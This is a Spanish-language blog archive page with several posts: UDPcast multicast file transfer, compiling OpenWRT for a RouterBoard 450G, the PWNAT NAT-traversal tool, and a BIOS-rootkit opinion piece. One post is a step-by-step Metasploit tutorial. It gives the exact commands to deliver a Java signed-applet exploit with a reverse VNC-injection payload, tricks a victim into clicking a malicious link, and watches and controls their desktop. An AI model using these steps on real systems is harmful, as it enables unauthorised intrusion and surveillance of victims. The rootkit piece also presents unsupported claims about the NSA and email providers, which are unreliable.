Archives for 

LAN

Transferencia de archivos en una red local con UDPcast

En muchas ocasiones tenemos la necesidad de transferir archivos entre computadores, dentro de una red local (LAN).

Dependiendo de ciertas variables, como el tamaño del archivo o los PCs a los que se debe transferir dicho archivo; pensaríamos en diferentes soluciones por ejemplo pasarlo con scp o cualquier otro método que se nos ocurra (Ahí entraríamos a evaluar que tan viable es usar cada método).

Hace poco usé UDPcast, para dicha tarea y me ha parecido realmente útil. La situación era la siguiente:

– Había que pasar una imagen de 22GB que se encontraba en 1 PC, hacía el resto, más o menos 10 equipos.

Teniendo en cuenta que el archivo es muy grande y la cantidad de equipos a los que se debe pasar es considerable, pasar de uno en uno no es viable. Con UDPcast  podemos enviar desde un equipo donde se encuentre el archivo, a toda una red, pero no es que se envíe a todos los equipos de la red, lo que sucede es que se queda a la espera de conexiones, de algunos o todos los equipos de esa red (No necesariamente todos) esto se debe a que UDPcast usa Multicast, cuando los equipos del “grupo multicast” hayan hecho la petición, la transferencia del archivo comienza simultáneamente para todos esos equipos.

Cómo se hace?

– Instalar el paquete UDPcast

– Desde el Pc que tiene el archivo a transferir lanzamos el siguiente comando:

$ udp-sender  -p “gzip -c”  –file  /ruta/archivo  –min-receivers N

En la opción  –file indicamos la ruta del archivo a transferir y en  –min-receivers  indicamos el número de PCs a los que vamos a transferir el archivo. Con la opción -p enviamos el archivo comprimido. Al ejecutarlo:

Udp-sender 20100130
Using mcast address 232.168.0.100
UDP sender for  /ruta/archivo at 192.168.0.100 on eth1
Broadcasting control to 192.168.0.255

 

En este momento se encuentra en espera de conexiones.

–  Desde los demás equipos de la red, hacemos la petición del archivo:

$ udp-receiver  -p  “gzip -dc”  –file  archivo

Con  -p  “gzip -dc” descomprimimos el archivo mientras se transfiere. Al ejecutarlo:

Udp-receiver 20100130
Compressed UDP receiver for archivo at 192.168.0.101 on eth1
received message, cap=00000009
Connected as #0 to 192.168.0.100
Listening to multicast on 232.168.0.100
Press any key to start receiving data!

Hacemos lo mismo para el resto de quipos del “grupo multicast”, así cuando estén los equipos haciendo la petición, la transferencia comienza al tiempo para todos.

Para más información acerca de Multicast Aquí

 

Como instalar OpenWRT en Mikrotik Routerboard 450G [Parte 1]

Hace tiempo queria instalar openWRT en cualquier dispositivo(obviamente alguno compatible), esta semana tuve la oportunidad de  tener una routerBoard 450G en la mano, asi que decidi probar y darme la tarea de instalar este  maravilloso firmware. El proceso  es mas o menos sencillo, hay que tener algunos conocimientos basicos en TFTP,  y un servidor DHCP,  A continuacion mostrare los pasos que segui para realizar la instalacion correctamente, pero antes, es bueno tener alguna teoria clara.

La siguiente informacion es tomada de la wiki

¿Que es OpenWRT?

OpenWRT es una distribución de Linux basada en firmware usada para dispositivos empotrados tales como routers personales.

El soporte fue limitado originalmente al modelo Linksys WRT54G, pero desde su rápida expansión se ha incluido soporte para otros fabricantes y dispositivos, incluidos el Netgear, D-Link, ASUS y algunos otros. El router más popular sigue siendo el Linksys WRT54G y el ASUS WL500G. OpenWRT utiliza principalmente un interfaz de línea de comando, pero también dispone de una interfaz WEB en constante mejora. El soporte técnico es provisto como en la mayoría de los proyectos OpenSource, a través de foros y su canal IRC.

Ahora que sabemos, que es OpenWRT, y por ende que ventajas trae instalarlo en algun dispositivo(que son muchas!!), procedemos a realizar la instalacion:

  1. Descargamos la ultima revision:
  2. svn co svn://svn.openwrt.org/openwrt/trunk kamikaze
    (Deben tener subversion instalado)

  3. Entramos a la carpeta kamikaze y ejecutamos el siguiente comando
  4. cd kamikaze

    make menuconfig (no ejecutar como root)

    Cabe aclarar que es muy probable que al ejecutar el comando  se presenten algunos errores de dependencias, si esto ocurre,  podemos ayudarnos en el gestor de paquetes para resolver estos inconvenientes.

  5. Despues de resolver todos los errores,  nos debe aparecer el siguiente menu: (Notese que el proceso es muy similar a la compilacion de un kernel en GNU/Linux)
  6. En este menu podemos definir que  modulos y que funcionalidades deseamos que tenga nuetra imagen de  OpenWRT,  ese proceso lo dejo a decision de ustedes, pueden navegar por el menu y decidir que necesitan segun sus requerimientos. Sin embargo  como vamos a instalar OpenWRT en una routerboard 450G debemos escoger en el target System,  el Hardware de este dispositivo, por tal razon escogeremos este “Atheros AR71xx/AR7240/AR913x”
  7. Otra cosa que debemos tener en cuenta en target images debemos selecciona la opcion ramdisk, ya que inicialmente lo que haremos es cargar la imagen del OpenWRT en la maquina para verificar su funcionamiento. y despues de esto si escribiremos la imagen en el memoria del equipo
  8. Despues haber realizado los cambios, guardamos la configuracio y procedemos a  compilar

make

Al terminar el proceso de compilacion, tendremos un directorio bin el cual tendra las imagenes que necesitamos para realizar la instalacion. En la proxima parte explicare como pasamos la imagen al dispositivo y  realizar la instalacion. Espero que les haya gustado y  que  en verdad lo prueben por que vale la pena. Esperen mas adelante la segunda parte

Como inyectar un servidor VNC en una maquina remota usando el metasploit

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

  • Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
  • JAVA -> Es necesario que la victima tenga instalado JAVA instalado
  • Que la victima acepte el certificado.
  • Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

    msfupdate

El siguiente paso es correr la consola del metasploit:

    msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

    use exploit/multi/browser/java_signed_applet
    set payload windows/vncinject/reverse_tcp
    set lhost 192.168.100.1 -> Ip local
    lhost => 192.168.1.100
    exploit

A continuacion debe salir algo como esto:

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.

PWNAT – Herramienta cliente de comunicación NAT to NAT

PWNAT, es una herramienta que permite a un sin numero de clientes que se encuentren detrás de un NAT comunicarse con un server detrás de un NAT diferente, sin un puerto de reenvío y sin una configuración de DMZ en el router para comunicarse directamente con los demás.

En resumen, PWNAT funciona como un proxy detrás de un NAT, no hay middle man, no hay proxies, ni terceras partes involucradas en el proceso. Lo más importante es que el cliente se pueda conectar a cualquier host o puerto en cualquier host o puerto remoto.

PWNAT esta basado en el software UDP tunneling hecho por Daniel Meekins, udptunnel y chownat.

PWNAT trabaja en la mayoria de los sistemas operativos *nix.

Para descargar esta herramienta este es el enlace

SINOPSIS

uso: ./pwnat <-s | -c> <args>

  -c    modo Cliente
    <args>: [local ip] <local port> <proxy host> [proxy port (def:2222)] <remote host> <remote port>

  -s    Modo servidor
    <args>: [local ip] [proxy port (def:2222)] [[allowed host]:[allowed port] ...]

  -6    use IPv6
  -v    show debug output (up to 2)
  -h    show help and exit

Fuente

Rootkit, un virus espía indetectable

Hace poco, expertos en seguridad informática expusieron públicamente en la conferencia “Black hat cómo funciona el sistema comercialmente denominado “CompuTrace” y que originalmente es un software “antirobo”. Contenido en la memoria del BIOS, el virus se oculta ante el Sistema Operativo siendo casi indetectable e imperceptible, y persiste luego de los típicos “formateos”.

El título de este artículo va a sonar paranoico para el clásico perfil del usuario medio de Internet: Escéptico, exhibicionista, confiado, fan, consumista, conformista, dependiente, etc.

Según ellos (la gran mayoría) en la nueva moral “moderna” la privacidad debe morir… Y todo el mundo debe estar registrado con nombre, apellido, foto, y todos sus datos personales, junto a sus amigos en alguna “Red Social”.

Indirectamente, según la nueva moral, todo aquel que quiera privacidad es un potencial “terrorista”, y nadie quiere estar “marginado fuera del sistema”.

Ojala lo que yo escribiese sería de Ciencia Ficción, o estaría equivocado. (Uno muchas veces se equivoca). Pero en esta temática la cual escribo (política y tecnología) el tiempo y la experiencia no hacen más que comprobar y confirmar la información o los ensayos que vengo publicando en la red.

En este caso, para el lector no informático o tecnofóbico: Nos referimos a BIOS, el Software esencial de toda computadora/ordenador, el cual está grabado en una memoria o chip de todas las mismas, y cuya función es elemental: encender y reconocer el hardware de todas las PC, lo primero que se ejecuta.

Recientemente, unos expertos en seguridad argentinos han mostrado en conferencias públicas cómo funciona el sistema comercialmente denominado “CompuTrace” y que originalmente es un Software “antirobo”. En pocas palabras, han mostrado públicamente como la mayoría de los BIOS populares (AMI, Award, Phoenix) pueden estar infectados fácilmente por un virus Rootkit (un Software que se oculta ante el Sistema Operativo siendo casi indetectable e imperceptible) contenido en la memoria del BIOS, haría a este virus persistente contra los típicos formateos de un disco rígido, y luego enviando conectándose a una casa central, monitoreando con la IP (dirección única en Internet) entre otra información y probablemente dando control remoto a los agentes.

Esta tecnología está patentada por EEUU, teniendo en cuenta las leyes antidemocráticas que hay (como las de las puertas traseras como requisito legal), es un dato importante. Esta línea es experimental sólo la incluí para que sepan que la verdadera fuente de este artículo es http:///http://www.estrellaroja.info

Lo peligroso: Este sistema comenzó a implementarse MASIVAMENTE en las PC y portatiles Notebook’s. Quedando activado o estando ahí posibilitando fácilmente su activación y dejando vulnerable a la privacidad de dicha máquina. El mismo virus rootkit es independiente del Sistema Operativo. La pregunta inevitable, ¿la información de pueblos enteros, de Estados soberanos pueden ser fácilmente también afectadas por este método?

A estilo “bonustrack”, informar también: Emails encriptados gratuitos serían una trampa, era un poco “sospechoso” los servicios de Correo encriptado como Hushmail o S-mail, estarían TAMBIÉN [0] siendo controlados por la NSA [1]. Como también Google estaría empezando a ser informadora de esta agencia [2].

Cuba ya se ha puesto a la defensiva contra el plan imperialista de “exportación de Facebook/MSN” [3], aunque el ALBA recientemente sufre una operación de prensa contra Chávez relacionada con “la censura de Internet”- EEUU: Campaña contra Chávez e Internet http://www.europapress.es/internacional/noticia-venezuela-venezuela-crea-comision-especial-controlar-internet-20100317033647.html

China ha denunciado a EEUU: http://www.jornada.unam.mx/2010/03/13/index.php?section=mundo&article=016n1mun

Información utilizable para la desactivación del BIOS RootKit: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Deactivate_the_Rootkit

FUENTE